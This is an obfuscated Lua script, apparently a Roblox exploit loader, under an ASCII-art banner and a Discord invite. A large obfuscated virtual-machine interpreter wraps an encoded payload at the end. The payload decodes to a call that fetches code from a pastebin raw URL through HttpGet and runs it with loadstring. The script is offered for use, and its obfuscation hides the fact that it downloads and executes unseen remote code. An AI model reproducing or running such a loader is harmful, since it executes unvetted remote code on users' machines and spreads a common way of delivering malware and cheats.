--[[

░░░░░██╗░█████╗░███████╗██╗░░░░░
░░░░░██║██╔══██╗██╔════╝██║░░░░░
░░░░░██║███████║█████╗░░██║░░░░░
██╗░░██║██╔══██║██╔══╝░░██║░░░░░
╚█████╔╝██║░░██║███████╗███████╗
░╚════╝░╚═╝░░╚═╝╚══════╝╚══════╝

discord.gg/CpA3K467Av

]]

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=getfenv or function()return _ENV;end;local v9=setmetatable;local v10=pcall;local v11=select;local v12=unpack or table.unpack;local v13=tonumber;local function v14(v15,v16,...)local v17=1;local v18;v15=v4(v3(v15,5),"..",function(v29)if (v1(v29,2)==79) then v18=v0(v3(v29,1,1));return "";else local v62=v2(v0(v29,16));if v18 then local v70=v5(v62,v18);v18=nil;return v70;else return v62;end end end);local function v19(v30,v31,v32)if v32 then local v63=(v30/(((1519 -(260 + 1253)) -4)^(v31-(1 + 0))))%((7 -5)^(((v32-(1 -0)) -(v31-1)) + 1 + 0));return v63-(v63%(2 -(973 -(25 + 947))));else local v64=0 + 0;local v65;while true do if (v64==(0 -0)) then v65=(1 + 1)^(v31-(3 -2));return (((v30%(v65 + v65))>=v65) and 1) or (1303 -(992 + 311));end end end end local function v20()local v37=v1(v15,v17,v17);v17=v17 + 1;return v37;end local function v21()local v38,v39=v1(v15,v17,v17 + (457 -(395 + 60)));v17=v17 + (5 -3);return (v39 * 256) + v38;end local function v22()local v40,v41,v42,v43=v1(v15,v17,v17 + 2 + 1);v17=v17 + (10 -6);return (v43 * (16778796 -((842 -482) + 1047 + 173))) + (v42 * (221978 -156442)) + (v41 * (48 + 208)) + v40;end local function v23()local v44=v22();local v45=v22();return (( -2 * v19(v45,32)) + (721 -(122 + 598))) * ((2 + 0)^(v19(v45,374 -(159 + 194),798 -((1356 -1016) + 427)) -(2743 -(87 + 1633)))) * ((((v19(v45,1 + 0,59 -(16 + 23)) * ((3 -1)^(1556 -(954 + 570)))) + v44)/(2^52)) + 1 + 0);end local function v24(v33)local v46;if  not v33 then local v66=1061 -(400 + 661);while true do if (v66==(0 -0)) then v33=v22();if (v33==((15 + 940) -(804 + 151))) then return "";end break;end end end v46=v3(v15,v17,(v17 + v33) -(343 -(49 + 293)));v17=v17 + v33;local v47={};for v59=1, #v46 do v47[v59]=v2(v1(v3(v46,v59,v59)));end return v6(v47);end local v25=v22;local function v26(...)return {...},v11("#",...);end local function v27()local v48=0 + 0;local v49;local v50;local v51;local v52;local v53;local v54;while true do local v61=0 + 0;while true do if (v61~=(855 -(482 + 373))) then else if (v48==(0 + 0)) then local v77=933 -(165 + 768);local v78;while true do if ((0 -0)~=v77) then else v78=1451 -(761 + 690);while true do if ((1 + 0)~=v78) then else v51={};v48=1;break;end if (v78~=(651 -(517 + 134))) then else v49={};v50={};v78=650 -(514 + 135);end end break;end end end if (v48~=(1 + 2)) then else local v79=1420 -(1303 + 117);while true do if (v79==(1961 -(197 + 1764))) then for v90=1,v22() do v50[v90-(332 -(277 + 54))]=v27();end for v92=2 -1,v22() do v51[v92]=v22();end v79=1;end if (v79~=(2 -1)) then else return v52;end end end v61=2 -1;end if (v61~=(1456 -(74 + 1381))) then else if (v48~=(1 + 0)) then else v52={v49,v50,nil,v51};v53=v22();v54={};v48=2;end if (v48==(7 -5)) then for v81=251 -(206 + 44),v53 do local v82=1445 -(376 + 1069);local v83;local v84;local v85;while true do if (v82==0) then local v94=453 -(71 + 382);while true do if (v94==(1 + 0)) then v82=1 + 0;break;end if (v94==0) then v83=1980 -(804 + 1176);v84=nil;v94=1;end end end if (v82==(1842 -(938 + 903))) then v85=nil;while true do if (v83==(1948 -(1022 + 926))) then local v110=0;while true do if ((0 + 0)==v110) then v84=v20();v85=nil;v110=2 -1;end if (v110~=(1 + 0)) then else v83=1 -0;break;end end end if (v83==(2 -1)) then if (v84==(1 -0)) then v85=v20()~=0;elseif (v84==(4 -2)) then v85=v23();elseif (v84==(8 -5)) then v85=v24();end v54[v81]=v85;break;end end break;end end end v52[212 -(85 + 124)]=v20();for v86=1,v22() do local v87=0 -0;local v88;local v89;while true do if (v87==(0 -0)) then v88=0;v89=nil;v87=1;end if (v87~=(1854 -(975 + 878))) then else while true do if (v88~=0) then else v89=v20();if (v19(v89,1 + 0,1)~=(1945 -(267 + 1678))) then else local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==(938 -(234 + 703))) then v119=nil;v120=nil;v116=933 -(572 + 359);end if (v116~=(0 -0)) then else v117=0 + 0;v118=nil;v116=770 -(659 + 110);end if (v116==(2 + 0)) then v121=nil;while true do if (v117==(3 -2)) then v120=nil;v121=nil;v117=176 -(12 + 162);end if (v117~=2) then else while true do if (v118~=(1844 -(144 + 1698))) then else local v125=0;while true do if (1==v125) then v118=3;break;end if (v125~=0) then else if (v19(v120,1,2 -1)~=(1 + 0)) then else v121[2]=v54[v121[591 -(285 + 304)]];end if (v19(v120,66 -(28 + 36),2)~=(2 -1)) then else v121[1 + 2]=v54[v121[717 -(173 + 541)]];end v125=1;end end end if (v118~=(0 -0)) then else v119=v19(v89,6 -4,49 -(14 + 32));v120=v19(v89,1711 -(676 + 1031),917 -(379 + 532));v118=3 -2;end if (v118~=1) then else v121={v21(),v21(),nil,nil};if (v119==0) then local v127=0 -0;local v128;local v129;while true do if (v127==(2 -1)) then while true do if (v128==0) then v129=0 + 0;while true do if (v129~=(1353 -(933 + 420))) then else v121[3]=v21();v121[1526 -(248 + 1274)]=v21();break;end end break;end end break;end if (v127==(0 -0)) then v128=1894 -(159 + 1735);v129=nil;v127=1 -0;end end elseif (v119==(4 -3)) then v121[3]=v22();elseif (v119==(1 + 1)) then v121[1158 -(76 + 1079)]=v22() -(2^16);elseif (v119==3) then local v163=0;local v164;local v165;while true do if (v163~=(0 -0)) then else v164=0;v165=nil;v163=1 + 0;end if (v163==(1 -0)) then while true do if ((0 + 0)==v164) then v165=0 -0;while true do if (v165==(444 -(336 + 108))) then v121[1267 -(322 + 942)]=v22() -((556 -(37 + 517))^16);v121[4 + 0]=v21();break;end end break;end end break;end end end v118=1 + 1;end if (v118==(3 + 0)) then if (v19(v120,3 + 0,509 -(113 + 393))~=(1 -0)) then else v121[4 + 0]=v54[v121[4]];end v49[v86]=v121;break;end end break;end if ((0 -0)==v117) then local v124=0 -0;while true do if (v124==(0 + 0)) then v118=0 -0;v119=nil;v124=1821 -(51 + 1769);end if (v124~=(1 -0)) then else v117=19 -(12 + 6);break;end end end end break;end end end break;end end break;end end end v48=3 + 0;end break;end end end end local function v28(v34,v35,v36)local v55=0;local v56;local v57;local v58;while true do if (v55==0) then v56=v34[1];v57=v34[2];v55=1;end if (v55==1) then v58=v34[3];return function(...)local v71=0;local v72;local v73;local v74;local v75;local v76;while true do if (3==v71) then A,B=v26(v10(v76));if  not A[1] then local v95=v34[4][v72] or "?";error("Script error at ["   .. v95   .. "]:"   .. A[2]);else return v12(A,2,B);end break;end if (v71==1) then v74={...};v75=v11("#",...) -1;v71=2;end if (v71==0) then v72=1;v73= -1;v71=1;end if (v71==2) then v76=nil;v76=function()local v96=v56;local v97=v57;local v98=v58;local v99=v26;local v100={};local v101={};local v102={};for v106=0 + 0,v75 do if ((v106>=v98) or ((1614 + 138)==(2090 + 547))) then v100[v106-v98]=v74[v106 + 1];else v102[v106]=v74[v106 + 1 + 0];end end local v103=(v75-v98) + 1 + 0;local v104;local v105;while true do local v107=0;local v108;local v109;while true do if ((v107==(289 -(227 + 62))) or ((780 + 930)>(6707 -3961))) then v108=(0 -0) + 0;v109=nil;v107=2 -1;end if ((v107==(1361 -(811 + 549))) or ((5264 -(918 + (2830 -1985)))<(105 -49))) then while true do if ((v108==(0 + 0)) or ((1905 -976)>=(3209 -1520))) then v109=0 + 0;while true do if ((((2185 + 2511) -2559)<(2511 + 900)) and (v109==0)) then local v122=0;local v123;while true do if ((v122==(0 + 0)) or ((3023 -(633 + 32))<=(3296 -(661 + 1254)))) then v123=0 -0;while true do if ((v123==(0 -0)) or ((4670 -(1386 + 569))<(944 + 850))) then local v132=0 -(498 -(240 + 258));while true do if ((v132==(1029 -(249 + 780))) or (4628<(3446 -(1394 + 351)))) then v104=v96[v72];v105=v104[351 -(252 + 8 + 90)];v132=1954 -(1303 + (2072 -(1057 + 365)));end if ((v132==(2 -1)) or ((16648 -12018)<(111 + 757))) then v123=(3 -2) -0;break;end end end if ((3342<=(2257 + 2521)) and (v123==(1 -0))) then v109=1;break;end end break;end end end if ((v109==(1 + 0 + 0)) or ((5450 -(1586 + 128))<=((24720 -14167) -6850))) then if ((v105<=3) or ((5258 -(494 + 1420))>=(2062 + 2335))) then if (((4812 -(221 + 685))==(7451 -3545)) and (v105<=(3 -2))) then if ((272<2606) and (v105==(0 -0))) then do return;end else v102[v104[(3945 -2300) -(378 + 1265)]]();end elseif ((v105>(3 -1)) or ((4529 -2457)>(1962 + 2981))) then local v133=0 -0;local v134;local v135;while true do if ((v133==0) or ((1274 -(354 + (363 -253)))>((12557 -2976) -4809))) then v134=v104[2];v135=v102[v104[1780 -(1679 + 98)]];v133=569 -((250 -101) + 419);end if ((v133==((3310 -(670 + 1061)) -(1437 + 141))) or (4941<=(1381 -(489 + 92)))) then v102[v134 + (1869 -(546 + 1322))]=v135;v102[v134]=v135[v104[4]];break;end end else v102[v104[1114 -(808 + 304)]]=v104[1 + (79 -(8 + 69))]~=(0 + 0);end elseif ((v105<=(12 -7)) or ((5414 -(2219 + 535))<(81 + (662 -(4 + 396))))) then if (((4318 -(604 + 1006))<((6813 -2981) + (2150 -(1635 + 362)))) and (v105==(1 + 3))) then local v137=0 -0;local v138;local v139;local v140;local v141;local v142;while true do if (((576 -(294 + 86))==(857 -661)) and (v137==(1 + 0))) then v140=nil;v141=nil;v137=51 -((65 -31) + 15);end if (((13074 -10343)<(2560 + 2139)) and (v137==(0 -(1409 -(744 + 665))))) then v138=0 + 0;v139=nil;v137=1;end if ((v137==2) or ((6 + 239 + 574)<(1062 -(671 + 26)))) then v142=nil;while true do if (((5217 -(632 + 43))>=13) and (v138==(1513 -(737 + 775)))) then local v166=0 -0;local v167;while true do if ((v166==0) or (((6052 -(1550 + 317)) -(85 + 972))>(734 + 3171))) then v167=0;while true do if ((0==v167) or ((2862 + 221)==((5640 + 2449) -5045))) then v73=(v141 + v139) -(1593 -(778 + 814));v142=0 -0;v167=1 -(706 -(620 + 86));end if (((1687 -(75 + 1611))==v167) or ((5670 -(138 + 18 + 639))<(579 -182))) then v138=3 -1;break;end end break;end end end if ((v138==(665 -(101 + 564))) or ((5548 -(564 + 1371))<(1483 + 398))) then local v168=0 -0;local v169;while true do if ((v168==(0 + (0 -0))) or (4609<3160)) then v169=0 + 0;while true do if ((v169==(1 + 0)) or ((3824 -(390 + 110))<(180 + 364 + (4334 -1988)))) then v138=1 + 0 + 0;break;end if ((v169==(708 -(43 + 665))) or ((5491 -(303 + 303 + 6))<=987)) then local v178=0;while true do if ((v178==(0 + 0 + 0)) or (((3026 -(229 + 609)) + 1944)<=(3979 -(393 + 41)))) then v139=v104[1477 -(1302 + 173)];v140,v141=v99(v102[v139](v12(v102,v139 + 1 + 0,v104[1539 -(59 + 1477)])));v178=1189 -(766 + 422);end if ((v178==1) or ((323 + 181)>3475)) then v169=1 + 0;break;end end end end break;end end end if ((v138==(661 -(271 + 388))) or ((5101 -(54 + 54 + 102))==4346)) then for v172=v139,v73 do local v173=0 -0;local v174;local v175;while true do if ((45<=4317) and ((0 -0)==v173)) then v174=(0 -0) -0;v175=nil;v173=(760 -(745 + 12)) -2;end if (((1 + (0 -0))==v173) or (((355 -250) + 289)>=(2145 + 94))) then while true do if (((268 + 371)<(1033 -(43 + 238))) and (v174==(0 -0))) then v175=(1941 -(402 + 1053)) -(240 + 246);while true do if ((v175==(0 -0)) or ((3950 -(8 + 49))<=(7364 -3715))) then v142=v142 + ((688 + 829) -(1424 + 92));v102[v172]=v140[v142];break;end end break;end end break;end end end break;end end break;end end else local v143=0;local v144;local v145;while true do if ((v143==0) or ((1843 -1256)>=(565 + 320))) then v144=(1580 -(966 + 614)) -0;v145=nil;v143=1001 -(100 + 900);end if ((3367>=(555 + 2551)) and (v143==(1 + 0))) then while true do if ((v144==(0 + 0)) or ((470 + 208)>=(6276 -(935 + 1233)))) then v145=v104[7 -5];v102[v145]=v102[v145](v12(v102,v145 + 1 + 0,v73));break;end end break;end end end elseif ((v105>(3 + 3)) or ((2433 -(72 + 60))<=(110 + 2026))) then v102[v104[2]]=v36[v104[238 -(133 + 102)]];else v102[v104[1 + 1]]=v104[3 + 0];end v72=v72 + (1805 -(13 + (2184 -(383 + 10))));break;end end break;end end break;end end end end;v71=3;end end end;end end end return v28(v27(),{},v16)(...);end v14("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F7050526B6E43655500093O0012073O00013O001207000100023O002003000100010003001206000300044O0002000400014O0004000100044O00055O00022O00013O000100016O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v8(),...);end
